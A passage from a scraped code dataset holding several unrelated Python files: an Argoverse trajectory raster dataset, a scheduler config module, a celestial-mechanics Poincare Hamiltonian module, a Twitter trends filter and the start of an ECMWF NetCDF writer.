end_position[1]])\n\n\ndef linear_path_to_tensor(path, pad=-1):\n return torch.stack([linear_cmd_to_tensor(cmd_codes['m'], path[0], pad=pad)] + [\n linear_cmd_to_tensor(cmd_codes['l'], path[i], path[i - 1], pad=pad) for i in range(1, len(path))])\n\n\ndef apply_colors(paths, colors, idxs: slice = COLOR_IDXS):\n colors = colors if colors is not None else [-1] * len(paths)\n for i in range(len(paths)):\n paths[i][:, idxs] = colors[i]\n return paths\n\n\n\n\nclass RasterDataset(Dataset):\n \"\"\"PyTorch Dataset for LSTM Baselines.\"\"\"\n def __init__(self, data_dict: Dict[str, Any], args: Any, mode: str):\n \"\"\"Initialize the Dataset.\n\n Args:\n data_dict: Dict containing all the data\n args: Arguments passed to the baseline code\n mode: train/val/test mode\n\n \"\"\"\n self.data_dict = data_dict\n self.args = args\n self.mode = mode\n\n # Get input\n self.input_data = data_dict[\"{}_input\".format(mode)]\n if mode != \"test\":\n self.output_data = data_dict[\"{}_output\".format(mode)]\n self.data_size = self.input_data.shape[0]\n\n # Get helpers\n self.helpers = self.get_helpers()\n self.helpers = list(zip(*self.helpers))\n \n \n \n from argoverse.map_representation.map_api import ArgoverseMap\n\n self.avm = ArgoverseMap()\n self.mf=MapFeaturesUtils()\n \n\n def __len__(self):\n \"\"\"Get length of dataset.\n\n Returns:\n Length of dataset\n\n \"\"\"\n return self.data_size\n\n def __getitem__(self, idx: int\n ) -> Tuple[torch.FloatTensor, Any, Dict[str, np.ndarray]]:\n \"\"\"Get the element at the given index.\n\n Args:\n idx: Query index\n\n Returns:\n A list containing input Tensor, Output Tensor (Empty if test) and viz helpers. \n\n \"\"\"\n helper=self.helpers[idx]\n cnt_lines,img,cnt_lines_norm=self.mf.get_candidate_centerlines_for_trajectory(\n helper[0] if self.mode != \"test\" else helper[0][:20],\n yaw_deg=helper[5],centroid=helper[0][0],\n city_name=helper[1][0],avm=self.avm,\n viz=True,\n seq_len = 80,\n max_candidates=10,\n )\n \n \n res = torch.cat([linear_path_to_tensor(path, -1) for path in cnt_lines_norm], 0)\n\n return (\n torch.FloatTensor(self.input_data[idx]),\n torch.empty(1) if self.mode == \"test\" else torch.FloatTensor(\n self.output_data[idx]),\n img,\n cnt_lines,\n cnt_lines_norm,\n res,\n \n )\n\n def get_helpers(self) -> Tuple[Any]:\n \"\"\"Get helpers for running baselines.\n\n Returns:\n helpers: Tuple in the format specified by LSTM_HELPER_DICT_IDX\n\n Note: We need a tuple because DataLoader needs to index across all these helpers simultaneously.\n\n \"\"\"\n helper_df = self.data_dict[f\"{self.mode}_helpers\"]\n candidate_centerlines = helper_df[\"CANDIDATE_CENTERLINES\"].values\n# print(\"ss\",candidate_centerlines)\n candidate_nt_distances = helper_df[\"CANDIDATE_NT_DISTANCES\"].values\n xcoord = np.stack(helper_df[\"FEATURES\"].values\n )[:, :, FEATURE_FORMAT[\"X\"]].astype(\"float\")\n ycoord = np.stack(helper_df[\"FEATURES\"].values\n )[:, :, FEATURE_FORMAT[\"Y\"]].astype(\"float\")\n centroids = np.stack((xcoord, ycoord), axis=2)\n _DEFAULT_HELPER_VALUE = np.full((centroids.shape[0]), None)\n city_names = np.stack(helper_df[\"FEATURES\"].values\n )[:, :, FEATURE_FORMAT[\"CITY_NAME\"]]\n seq_paths = helper_df[\"SEQUENCE\"].values\n translation = (helper_df[\"TRANSLATION\"].values\n if self.args.normalize else _DEFAULT_HELPER_VALUE)\n rotation = (helper_df[\"ROTATION\"].values\n if self.args.normalize else _DEFAULT_HELPER_VALUE)\n\n use_candidates = self.args.use_map and self.mode == \"test\"\n\n candidate_delta_references = (\n helper_df[\"CANDIDATE_DELTA_REFERENCES\"].values\n if self.args.use_map and use_candidates else _DEFAULT_HELPER_VALUE)\n delta_reference = (helper_df[\"DELTA_REFERENCE\"].values\n if self.args.use_delta and not use_candidates else\n _DEFAULT_HELPER_VALUE)\n\n helpers = [None for i in range(len(LSTM_HELPER_DICT_IDX))]\n\n # Name of the variables should be the same as keys in LSTM_HELPER_DICT_IDX\n for k, v in LSTM_HELPER_DICT_IDX.items():\n helpers[v] = locals()[k.lower()]\n\n return tuple(helpers)\n","sub_path":"src/argoverse/utils/.ipynb_checkpoints/raster_utils-checkpoint.py","file_name":"raster_utils-checkpoint.py","file_ext":"py","file_size_in_byte":5615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"455763441","text":"# -*- coding: utf-8 -*-\n# 15/6/27\n# create by: snower\n\nimport os\nfrom .utils import string_type, number_type\n\n__config = {}\n\nDEFAULT_CONFIG = {\n \"LOG_FILE\": \"/var/log/funsun.log\",\n \"LOG_LEVEL\": \"ERROR\",\n \"LOG_FORMAT\": \"\",\n\n \"BIND_ADDRESS\": \"0.0.0.0\",\n \"PORT\": 6458,\n\n \"HTTP_BIND\": \"\",\n\n \"STORE_DRIVER\": \"mem\",\n\n \"STORE_MEM_STORE_FILE\": \"/tmp/forsun.session\",\n\n \"STORE_REDIS_HOST\": \"127.0.0.1\",\n \"STORE_REDIS_PORT\": 6379,\n \"STORE_REDIS_DB\": 0,\n \"STORE_REDIS_PREFIX\": \"forsun\",\n \"STORE_REDIS_SERVER_ID\": 0,\n \"STORE_REDIS_MAX_CONNECTIONS\": 8,\n \"STORE_REDIS_CLIENT_TIMEOUT\": 7200,\n \"STORE_REDIS_BULK_SIZE\": 5,\n\n \"ACTION_SHELL_CWD\": \"/tmp\",\n \"ACTION_HTTP_MAX_CLIENTS\": 64,\n \"ACTION_HTTP_CONNECT_TIMEOUT\": 5,\n \"ACTION_HTTP_REQUEST_TIMEOUT\": 120,\n \"ACTION_REDIS_MAX_CONNECTIONS\": 8,\n \"ACTION_REDIS_CLIENT_TIMEOUT\": 7200,\n \"ACTION_REDIS_BULK_SIZE\": 5,\n \"ACTION_THRIFT_MAX_CONNECTIONS\": 64,\n \"ACTION_MYSQL_USER\": \"root\",\n \"ACTION_MYSQL_PASSWD\": \"\",\n \"ACTION_MYSQL_MAX_CONNECTIONS\": 8,\n \"ACTION_MYSQL_WAIT_CONNECTION_TIMEOUT\": 7200,\n \"ACTION_MYSQL_IDLE_SECONDS\": 120,\n\n \"EXTENSION_PATH\": \"\",\n \"EXTENSIONS\": [],\n}\n\ndef get(name, default=None):\n return __config.get(name, default)\n\ndef set(name, value):\n old_value = __config[name]\n __config[name] = value\n return old_value\n\ndef update(config):\n __config.update(config)\n return __config\n\nupdate(DEFAULT_CONFIG)\nfor key, value in DEFAULT_CONFIG.items():\n env_value = os.environ.get(key)\n if env_value is not None:\n try:\n if isinstance(value, number_type):\n set(key, int(env_value))\n elif isinstance(value, float):\n set(key, float(env_value))\n elif isinstance(value, string_type):\n set(key, str(env_value))\n except:pass","sub_path":"forsun/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"180362107","text":"import numpy as np\nfrom sympy import symbols, S, binomial, summation, sqrt, cos, sin, Function,atan2,expand_trig,diff,Matrix\nfrom .hamiltonian import Hamiltonian\nfrom .disturbing_function import get_fg_coeffs , laplace_b\nfrom .disturbing_function import DFCoeff_C,eval_DFCoeff_dict,get_DFCoeff_symbol\nfrom .nbody_simulation_utilities import get_canonical_heliocentric_orbits,add_canonical_heliocentric_elements_particle\nfrom itertools import combinations\nimport rebound\nimport warnings\ndef get_re_im_components(x,y,k):\n \"\"\"\n Get the real and imaginary components of\n (x + sgn(k) * i y)^|k|\n \"\"\"\n if k==0:\n return 1,0\n absk = abs(k)\n sgnk = np.sign(k)\n re,im=0,0\n for l in range(0,absk+1):\n b = binomial(absk,l)\n if l%2==0:\n re += b * (sgnk * y)**l * x**(absk-l) * (-1)**(l//2)\n else:\n im += b * (sgnk * y)**l * x**(absk-l) * (-1)**((l-1)//2)\n return re,im\n\ndef single_true(iterable): # Returns true if only one element in the iterable is set \n # make generator from iterable setting any zeros as valid entries (otherwise they evaluate to False)\n i = iter([item if item != 0 else True for item in iterable]) # make generator and set zeros to valid inputs\n return any(i) and not any(i) # any(i) True once first valid item found. not any(i) ensures no additional ones exist\n\nclass PoincareParticle(object):\n \"\"\"\n A class representing an individual member (star, planet, or test particle) of a planetary system.\n\n Attributes\n ----------\n m : float\n Mass of particle.\n Mstar : float\n Mass of central body.\n \"\"\"\n def __init__(self, m, Mstar, l, gamma, q, G=1., sLambda=None, sGamma=None, sQ=None, Lambda=None, Gamma=None, Q=None, a=None, e=None, inc=None):\n \"\"\"\n We store the specific Lambda = sqrt(G*M*a) and specific Gamma = sLambda*(1-sqrt(1-e**2)) to support test particles\n \"\"\"\n if not single_true([sLambda, Lambda, a]):\n raise AttributeError(\"Can only pass one of Lambda, sLambda (specific Lambda, i.e. per unit mass), or a (semimajor axis)\")\n if not single_true([sGamma, Gamma, e]):\n raise AttributeError(\"Can only pass one of Gamma, sGamma (specific Gamma, i.e. per unit mass), or e (eccentricity)\")\n if not single_true([sQ, Q, inc]):\n raise AttributeError(\"Can only pass one of Q, sQ (specific Q, i.e. per unit mass), or inc (inclination)\")\n \n mu = m * Mstar / (m + Mstar)\n if sLambda:\n self.sLambda = sLambda\n elif Lambda:\n try:\n self.sLambda = Lambda/mu\n except:\n raise AttributeError(\"Need to pass specific actions (sLambda, sGamma, and sQ) or a, e, and inc for test particles\")\n elif a:\n self.sLambda = np.sqrt(G*M*a)\n\n if Gamma:\n try:\n sGamma = Gamma/mu\n except:\n raise AttributeError(\"Need to pass specific actions (sLambda, sGamma, and sQ) or a, e, and inc for test particles\")\n elif e:\n sGamma = self.sLambda*(1.-np.sqrt(1.-e**2))\n\n if Q:\n try:\n sQ = Q/mu\n except:\n raise AttributeError(\"Need to pass specific actions (sLambda, sGamma, and sQ) or a, e, and inc for test particles\")\n elif inc:\n sQ = (self.sLambda - self.sGamma) * (1 - np.cos(inc))\n\n self.skappa = np.sqrt(2.*sGamma)*np.cos(gamma) # X per unit sqrt(mass)\n self.seta = np.sqrt(2.*sGamma)*np.sin(gamma)\n\n self.ssigma = np.sqrt(2.*sQ)*np.cos(q) # Xinc per unit sqrt(mass)\n self.srho = np.sqrt(2.*sQ)*np.sin(q)\n\n self.m = m \n self.Mstar = Mstar\n self.G = G\n self.l = l\n \n @property\n def mu(self):\n return self.m * self.M / (self.M + self.m)\n @property \n def M(self):\n return self.Mstar + self.m\n\n @property\n def x(self):\n return (self.kappa - 1j * self.eta) / np.sqrt(2)\n @property\n def X(self):\n return self.x * np.sqrt(2 / self.Lambda)\n @property\n def y(self):\n return (self.sigma - 1j * self.rho) / np.sqrt(2)\n @property\n def Y(self):\n return self.y * np.sqrt(0.5 / self.Lambda)\n\n @property\n def xbar(self):\n return np.conj(self.x)\n @property\n def Xbar(self):\n return np.conj(self.X)\n @property\n def ybar(self):\n return np.conj(self.y)\n @property\n def Ybar(self):\n return np.conj(self.Y)\n\n @property\n def kappa(self):\n return np.sqrt(self.mu)*self.skappa\n @kappa.setter\n def kappa(self, value):\n self.skappa = value/np.sqrt(self.mu)\n @property\n def eta(self):\n return np.sqrt(self.mu)*self.seta\n @eta.setter\n def eta(self, value):\n self.seta = value/np.sqrt(self.mu)\n\n @property\n def sigma(self):\n return np.sqrt(self.mu)*self.ssigma\n @sigma.setter\n def sigma(self, value):\n self.ssigma = value/np.sqrt(self.mu)\n\n @property\n def rho(self):\n return np.sqrt(self.mu)*self.srho\n @rho.setter\n def rho(self, value):\n self.srho = value/np.sqrt(self.mu)\n\n @property\n def Lambda(self):\n return self.mu*self.sLambda\n @Lambda.setter\n def Lambda(self, value):\n self.sLambda = value/self.mu\n\n @property\n def Gamma(self):\n return self.mu*(self.skappa**2+self.seta**2)/2.\n @Gamma.setter\n def Gamma(self, value):\n self.sGamma = value/self.mu\n\n @property\n def Q(self):\n return self.mu*(self.ssigma**2+self.srho**2)/2.\n @Q.setter\n def Q(self, value):\n self.sQ = value/self.mu\n\n @property\n def sGamma(self):\n return (self.skappa**2+self.seta**2)/2.\n @property\n def gamma(self):\n return np.arctan2(self.seta, self.skappa)\n\n @property\n def sQ(self):\n return (self.ssigma**2+self.srho**2)/2.\n @property\n def q(self):\n return np.arctan2(self.srho,self.ssigma)\n\n @property\n def a(self):\n return self.sLambda**2/self.G/self.M\n @property\n def e(self):\n GbyL = self.sGamma/self.sLambda\n if 1-(1.-GbyL)*(1.-GbyL) < 0:\n raise AttributeError(\"sGamma:{0}, sLambda:{1}, GbyL:{2}, val:{3}\".format(self.sGamma, self.sLambda, GbyL, 1-(1.-GbyL)*(1.-GbyL)))\n return np.sqrt(1 - (1-GbyL)*(1-GbyL))\n @property\n def inc(self):\n QbyLminusG = self.sQ / (self.sLambda - self.sGamma)\n cosi = 1 - QbyLminusG\n if np.abs(cosi) > 1:\n raise AttributeError(\"sGamma:{0}, sLambda:{1}, sQ:{2}, cosi:{3}\".format(self.sGamma, self.sLambda, self.sQ,cosi))\n return np.arccos(cosi)\n\n @property\n def pomega(self):\n return -self.gamma\n\n @property\n def Omega(self):\n return -self.q\n @property\n def n(self):\n return np.sqrt(self.G*self.M/self.a**3)\n\nclass Poincare(object):\n \"\"\"\n A class representing a collection of Poincare particles constituting a planetary system.\n \"\"\"\n def __init__(self, G, poincareparticles=[]):\n self.G = G\n self.t = 0\n self.particles = [PoincareParticle(m=np.nan, Mstar=np.nan, G=np.nan, l=np.nan, gamma=np.nan,q=np.nan, sLambda=np.nan, sGamma=np.nan, sQ=np.nan)] # dummy particle for primary\n try:\n for p in poincareparticles:\n self.add(m=p.m, Mstar=p.Mstar, sLambda=p.sLambda, l=p.l, sGamma=p.sGamma, gamma=p.gamma, sQ = p.sQ,q=p.q)\n except TypeError:\n raise TypeError(\"poincareparticles must be a list of PoincareParticle objects\")\n\n @classmethod\n def from_Simulation(cls, sim, average=True):\n masses = [p.m for p in sim.particles]\n Mstar = masses[0]\n pvars = Poincare(sim.G)\n ps = sim.particles\n o = get_canonical_heliocentric_orbits(sim)\n for i in range(1,sim.N-sim.N_var):\n orb = o[i-1]\n M = Mstar + masses[i]\n m = masses[i]\n if orb.a <= 0. or orb.e >= 1.:\n raise AttributeError(\"Celmech error: Poincare.from_Simulation only support elliptical orbits. Particle {0}'s (heliocentric) a={1}, e={2}\".format(i, orb.a, orb.e))\n sLambda = np.sqrt(sim.G*M*orb.a)\n sGamma = sLambda*(1.-np.sqrt(1.-orb.e**2))\n sQ = sLambda*np.sqrt(1.-orb.e**2) * (1 - np.cos(orb.inc))\n pvars.add(m=m,Mstar=Mstar, sLambda=sLambda, l=orb.l, sGamma=sGamma, sQ = sQ, gamma=-orb.pomega,q=-orb.Omega)\n if average is True:\n pvars.average_synodic_terms()\n return pvars\n\n def to_Simulation(self, masses=None, average=True):\n \"\"\" \n Convert Poincare object to a REBOUND simulation.\n\n Arguments\n --------\n masses : array-like, optional\n If masses is None, will calculate physical masses from the m and M \n parameters stored by the particles. If masses is a list, will use \n those as the physical masses. Default is None.\n average : boole, optional\n If True, semi-major axes of simulation planets will be computed\n by converting 'mean' elements to 'osculating' ones to 0th order\n in eccentricity.\n\n Returns\n -------\n sim : rebound.Simulation\n \"\"\" \n\n if average is True:\n self.average_synodic_terms(inverse=True)\n\n if not masses:\n p1 = self.particles[1]\n masses = [p1.Mstar] + [p.m for p in self.particles]\n\n sim = rebound.Simulation()\n sim.G = self.G\n sim.add(m=masses[0])\n ps = self.particles\n for i in range(1, self.N):\n p = ps[i]\n elements = {element:getattr(p,element) for element in ['a','e','inc','l','pomega','Omega']}\n add_canonical_heliocentric_elements_particle(masses[i],elements,sim)\n sim.move_to_com()\n return sim\n \n def add(self, **kwargs):\n self.particles.append(PoincareParticle(G=self.G, **kwargs))\n\n def copy(self):\n return Poincare(self.G, self.particles[1:self.N])\n\n def average_synodic_terms(self, inverse=False):\n \"\"\"\n Do a canonical transformation to correct the Lambdas for the fact that we have implicitly\n averaged over all the synodic terms we do not include in the Hamiltonian.\n \"\"\"\n corrpvars = self.copy() # so we use original values when planet appears in more than one pair\n pairs = combinations(range(1,self.N), 2)\n #TODO assumes particles ordered going outward so a1 < a2 always. Sort first?\n for i1, i2 in pairs:\n ps = self.particles\n m1 = ps[i1].m\n m2 = ps[i2].m\n deltalambda = ps[i1].l-ps[i2].l\n G = self.G\n\n prefac = G/ps[i2].a/(ps[i1].n-ps[i2].n) \n alpha = ps[i1].a/ps[i2].a\n summation = (1. + alpha**2 - 2*alpha*np.cos(deltalambda))**(-0.5)\n s = prefac*(alpha*np.cos(deltalambda)-summation+laplace_b(0.5, 0, 0, alpha)/2.)\n if inverse is True:\n s *= -1\n corrpvars.particles[i1].sLambda += m2*s # prefac*m1*m2*s/m1 (sLambda=Lambda/m)\n corrpvars.particles[i2].sLambda -= m1*s\n \n for i, p in enumerate(self.particles):\n p.sLambda = corrpvars.particles[i].sLambda\n\n @property\n def N(self):\n return len(self.particles)\n\nclass PoincareHamiltonian(Hamiltonian):\n \"\"\"\n A class representing the Hamiltonian governing the dynamical evolution of a system of particles,\n stored as a :class:`celmech.poincare.Poincare` instance.\n\n Attributes\n ----------\n H : sympy expression\n Symbolic expression for the Hamiltonian.\n NH : sympy expression\n Symbolic expression for the Hamiltonian with \n numerical values of parameters substituted\n where applicable.\n N : int\n Number of particles\n particles : list\n List of :class:`celmech.poincare.PoincareParticle`s \n making up the system.\n state : :class:`celmech.poincare.Poincare`\n A set of Poincare variables to which \n transformations are applied.\n \"\"\"\n def __init__(self, pvars):\n Hparams = {symbols('G'):pvars.G}\n pqpairs = []\n ps = pvars.particles\n H = S(0) \n for i in range(1, pvars.N):\n pqpairs.append(symbols(\"kappa{0}, eta{0}\".format(i))) \n pqpairs.append(symbols(\"Lambda{0}, lambda{0}\".format(i))) \n pqpairs.append(symbols(\"sigma{0}, rho{0}\".format(i))) \n Hparams[symbols(\"mu{0}\".format(i))] = ps[i].mu\n Hparams[symbols(\"m{0}\".format(i))] = ps[i].m\n Hparams[symbols(\"M{0}\".format(i))] = ps[i].M\n H = self.add_Hkep_term(H, i)\n self.resonance_indices = []\n super(PoincareHamiltonian, self).__init__(H, pqpairs, Hparams, pvars) \n \n @property\n def particles(self):\n return self.state.particles\n\n @property\n def N(self):\n return len(self.particles)\n \n def state_to_list(self, state):\n ps = state.particles\n vpp = 6 # vars per particle\n y = np.zeros(vpp*(state.N-1)) # remove padded 0th element in ps for y\n for i in range(1, state.N):\n y[vpp*(i-1)] = ps[i].kappa\n y[vpp*(i-1)+1] = ps[i].eta\n y[vpp*(i-1)+2] = ps[i].Lambda\n y[vpp*(i-1)+3] = ps[i].l \n y[vpp*(i-1)+4] = ps[i].sigma\n y[vpp*(i-1)+5] = ps[i].rho\n return y\n def set_secular_mode(self):\n # \n state = self.state\n for i in range(1,state.N):\n Lambda0,Lambda = symbols(\"Lambda{0}0 Lambda{0}\".format(i))\n self.H = self.H.subs(Lambda,Lambda0)\n self.Hparams[Lambda0] = state.particles[i].Lambda\n self._update()\n\n def set_planar_mode(self):\n state = self.state\n ps = state.particles\n for i in xrange(1,state.N):\n rho,sigma = symbols(\"rho{0} sigma{0}\".format(i))\n self.H = self.H.subs({rho:0,sigma:0})\n ps[i].srho = 0\n ps[i].ssigma = 0\n self._update() \n\n def update_state_from_list(self, state, y):\n ps = state.particles\n vpp = 6 # vars per particle\n for i in range(1, state.N):\n ps[i].skappa = y[vpp*(i-1)]/np.sqrt(ps[i].mu)\n ps[i].seta = y[vpp*(i-1)+1]/np.sqrt(ps[i].mu)\n ps[i].sLambda = y[vpp*(i-1)+2]/ps[i].mu\n ps[i].l = y[vpp*(i-1)+3]\n ps[i].ssigma = y[vpp*(i-1)+4] / np.sqrt(ps[i].mu) \n ps[i].srho = y[vpp*(i-1)+5] / np.sqrt(ps[i].mu) \n \n \n def add_Hkep_term(self, H, index):\n \"\"\"\n Add the Keplerian component of the Hamiltonian for planet ''.\n \"\"\"\n G, M, mu, Lambda = symbols('G, M{0}, mu{0}, Lambda{0}'.format(index))\n #m, M, mu, Lambda, lam, Gamma, gamma = self._get_symbols(index)\n H += -G**2*M**2*mu**3 / (2 * Lambda**2)\n return H\n def add_monomial_term(self,kvec,zvec,indexIn=1,indexOut=2,update=True):\n \"\"\"\n Add individual monomial term to Hamiltonian. The term \n is specified by 'kvec', which specifies the cosine argument\n and 'zvec', which specfies the order of inclination and\n eccentricities in the Taylor expansion of the \n cosine coefficient. \n \"\"\"\n if (indexIn,indexOut,(kvec,zvec)) in self.resonance_indices:\n warnings.warn(\"Monomial term alread included Hamiltonian; no new term added.\")\n return\n G = symbols('G')\n mIn,muIn,MIn,LambdaIn,lambdaIn,kappaIn,etaIn,sigmaIn,rhoIn = symbols('m{0},mu{0},M{0},Lambda{0},lambda{0},kappa{0},eta{0},sigma{0},rho{0}'.format(indexIn)) \n mOut,muOut,MOut,LambdaOut,lambdaOut,kappaOut,etaOut,sigmaOut,rhoOut = symbols('m{0},mu{0},M{0},Lambda{0},lambda{0},kappa{0},eta{0},sigma{0},rho{0}'.format(indexOut)) \n \n alpha = self.particles[indexIn].a/self.state.particles[indexOut].a\n\t# aIn = LambdaIn * LambdaIn / mIn / mIn / G / MIn\n\t# aOut = LambdaOut * LambdaOut / mOut / mOut / G / MOut\n # alpha = aIn/aOut\n # Resonance components\n #\n k1,k2,k3,k4,k5,k6 = kvec\n z1,z2,z3,z4 = zvec\n C = get_DFCoeff_symbol(k1,k2,k3,k4,k5,k6,z1,z2,z3,z4,indexIn,indexOut)\n C_dict = DFCoeff_C(k1,k2,k3,k4,k5,k6,z1,z2,z3,z4)\n C_val = eval_DFCoeff_dict(C_dict,alpha)\n self.Hparams[C] = C_val\n rtLIn = sqrt(LambdaIn)\n rtLOut = sqrt(LambdaOut)\n xin,yin = get_re_im_components(kappaIn/rtLIn ,-etaIn / rtLIn,k3)\n xout,yout = get_re_im_components( kappaOut/rtLOut, -etaOut/rtLOut,k4)\n uin,vin = get_re_im_components(sigmaIn/rtLIn/2, -rhoIn/rtLIn/2,k5)\n uout,vout = get_re_im_components(sigmaOut/rtLOut/2, -rhoOut/rtLOut/2,k6)\n\n re = uin*uout*xin*xout - vin*vout*xin*xout - uout*vin*xout*yin - uin*vout*xout*yin - uout*vin*xin*yout - uin*vout*xin*yout - uin*uout*yin*yout + vin*vout*yin*yout\n im = uout*vin*xin*xout + uin*vout*xin*xout + uin*uout*xout*yin - vin*vout*xout*yin + uin*uout*xin*yout - vin*vout*xin*yout - uout*vin*yin*yout - uin*vout*yin*yout\n \n GammaIn = (kappaIn*kappaIn + etaIn*etaIn)/2\n GammaOut = (kappaOut*kappaOut + etaOut*etaOut)/2\n QIn = (sigmaIn*sigmaIn + rhoIn*rhoIn)/2\n QOut = (sigmaOut*sigmaOut + rhoOut*rhoOut)/2\n \n eIn_sq_term = (2 * GammaIn / LambdaIn )**z3\n eOut_sq_term = (2 * GammaOut / LambdaOut )**z4\n incIn_sq_term = ( QIn / LambdaIn / 2 )**z1\n incOut_sq_term = ( QOut / LambdaOut / 2 )**z2\n \n # Update internal Hamiltonian\n aOut_inv = G*MOut*muOut*muOut / LambdaOut / LambdaOut \n prefactor1 = -G * mIn * mOut * aOut_inv\n prefactor2 = eIn_sq_term * eOut_sq_term * incIn_sq_term * incOut_sq_term \n trig_term = re * cos(k1 * lambdaOut + k2 * lambdaIn) - im * sin(k1 * lambdaOut + k2 * lambdaIn) \n \n # Keep track of resonances\n self.resonance_indices.append((indexIn,indexOut,(kvec,zvec)))\n \n self.H += prefactor1 * C * prefactor2 * trig_term\n if update:\n self._update()\n \n def add_all_MMR_and_secular_terms(self,p,q,max_order,indexIn = 1, indexOut = 2):\n \"\"\"\n Add all disturbing function terms associated with a p:p-q mean\n motion resonance along with secular terms up to a given order.\n\n Arguments\n ---------\n p : int\n Coefficient of lambdaOut in resonant argument\n j*lambdaOut - (j-k)*lambdaIn\n q : int\n Order of the mean motion resonance.\n\n \"\"\"\n assert max_order>=0, \"max_order= {:d} not allowed, must be non-negative.\".format(max_order)\n if p=0, \"max_order= {:d} not allowed, must be non-negative.\".format(max_order)\n if p=0, \"max_order= {:d} not allowed, must be non-negative.\".format(max_order)\n raise RuntimeError(\"THIS METHOD NEEDS TO BE FIXED!!!\")\n max_order_by_2 = max_order//2\n max_order_by_4 = max_order//4\n for a in range(0,max_order_by_4+1):\n b_hi = max_order_by_2 - 2 * a\n if a==0:\n b_lo = 0\n else:\n b_lo = -b_hi\n for b in range(b_lo,b_hi+1):\n c_hi = max_order_by_2 - abs(b) - 2 * a\n if a == 0 and b ==0:\n c_lo = 0\n else:\n c_lo = -c_hi\n for c in range(c_lo,c_hi+1):\n k3 = a-b\n k4 = a+b\n k5 = -c-a\n k6 = c-a\n self.add_cos_term_to_max_order([0,0,k3,k4,k5,k6],max_order,indexIn,indexOut,update=False)\n\n # finish with update\n self._update()\n\n def add_cos_term_to_max_order(self,jvec,max_order,indexIn=1,indexOut=2,update = True):\n \"\"\"\n Add disturbing function term \n c(alpha,e1,e2,s1,s2) * cos(j1 * lambda + j2 * lambda1 + j3 * pomega1 + j4 * pomega2 + j5 * Omega1 + j6 * Omega2)\n approximating c up to order 'max_order' in eccentricity and inclination.\n\n Arguments\n ---------\n jvec : array-like\n Vector of integers specifying cosine argument.\n max_order : int\n Maximum order of terms in include in the expansion of c\n indexIn : int, optional\n Integer index of inner planet.\n indexOut : anit, optional\n Intgeger index of outer planet.\n \"\"\"\n _,_,j3,j4,j5,j6 = jvec\n order = max_order - abs(j3) - abs(j4) - abs(j5) - abs(j6)\n orderBy2 = order // 2\n N = orderBy2+1\n for z1 in range(0,N):\n for z2 in range(0,N - z1):\n for z3 in range(0,N - z1 - z2):\n for z4 in range(0,N - z1 - z2 - z3):\n zvec = [z1,z2,z3,z4]\n self.add_monomial_term(jvec,zvec,indexIn,indexOut,update=False)\n if update:\n self._update() \n\n def _get_laplace_lagrange_matrices(self):\n set_e_and_inc_zero_rule = {\n S('{0}{1}'.format(var,i)):0\n for i in range(1,self.N)\n for var in ['eta','kappa','rho','sigma']\n }\n mtrx = []\n for s1 in [S('eta{}'.format(i)) for i in range(1,self.N)]:\n row = []\n for s2 in [S('kappa{}'.format(i)) for i in range(1,self.N)]:\n entry= diff(self.derivs[s1],s2)\n row.append(entry.subs(set_e_and_inc_zero_rule))\n mtrx.append(row)\n ecc_mtrx = Matrix(mtrx)\n mtrx = []\n for s1 in [S('rho{}'.format(i)) for i in range(1,self.N)]:\n row = []\n for s2 in [S('sigma{}'.format(i)) for i in range(1,self.N)]:\n entry= diff(self.derivs[s1],s2)\n row.append(entry.subs(set_e_and_inc_zero_rule))\n mtrx.append(row)\n inc_mtrx = Matrix(mtrx)\n return ecc_mtrx,inc_mtrx\n","sub_path":"celmech/poincare.py","file_name":"poincare.py","file_ext":"py","file_size_in_byte":25689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"525188489","text":"def filter_manager(data):\n filtered_data = get_trends(data)\n final_fata = time_construct(filtered_data)\n return final_fata\n\n\ndef get_trends(data):\n trends = {\"Data\": []}\n\n index = 0\n for i in range(len(data[\"Data\"])):\n for j, k in data[\"Data\"][i].items():\n trends[\"Data\"].append({\"Index\": index+1})\n for m, n in k.items():\n trends[\"Data\"][index].update({m: n})\n index += 1\n\n return trends\n\n\ndef time_construct(data):\n trends = {\"Data\": []}\n\n for i in range(len(data[\"Data\"])):\n trends[\"Data\"].append({})\n for j, k in data[\"Data\"][i].items():\n if j != \"Time Query\":\n trends[\"Data\"][i].update({j: k})\n else:\n trends[\"Data\"][i].update({\"Date Query\": k[:10]})\n\n # adjusting time zone, with less three hours. UGLY, I know...\n time = k[11:19]\n hour = int(time[:2])\n hour = (hour-3) % 24\n if hour < 10:\n time = f\"0{hour}\" + time[2:]\n else:\n time = f\"{hour} \" + time[2:]\n trends[\"Data\"][i].update({\"Time Query\": time})\n\n return trends\n","sub_path":"a_data_processing/Twitter/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"219288094","text":"#! /usr/bin/env python2.7\n# -*- coding: utf-8 -*-\n#\n# pySpatialETL is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# any later version.\n#\n# pySpatialETL is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# Author : Fabien Rétif - fabien.retif@zoho.com\n#\nimport math\n\nfrom netCDF4 import Dataset\nfrom netCDF4 import date2num\nfrom numpy import float32\nfrom numpy import float64\n\nfrom spatialetl.coverage.io.CoverageWriter import CoverageWriter\n\n\nclass AcademicECMWFWriter (CoverageWriter):\n\n def __init__(self, myFile,\n lon,\n lat,\n times,\n wind_speed=0,\n wind_from_direction_angle=0,\n surface_air_pressure=1013.25, # Pression MSL\n sea_surface_air_pressure=1013.25, # Pression MSL\n surface_air_temperature=283.15, # 10°C\n dewpoint_temperature=283.15, # 10°C\n surface_downward_sensible_heat_flux=0,\n surface_downward_latent_heat_flux=0,\n surface_downward_solar_radiation=0,\n surface_downward_thermal_radiation=0,\n surface_solar_radiation=0,\n surface_thermal_radiation=0,\n total_rain=0,\n update=False):\n CoverageWriter.__init__(self,None,myFile);\n self.x_axis = lon;\n self.y_axis= lat;\n self.t_axis = times\n self.wind_speed = wind_speed\n self.wind_from_direction_angle = wind_from_direction_angle\n self.surface_air_pressure = surface_air_pressure\n self.sea_surface_air_pressure = 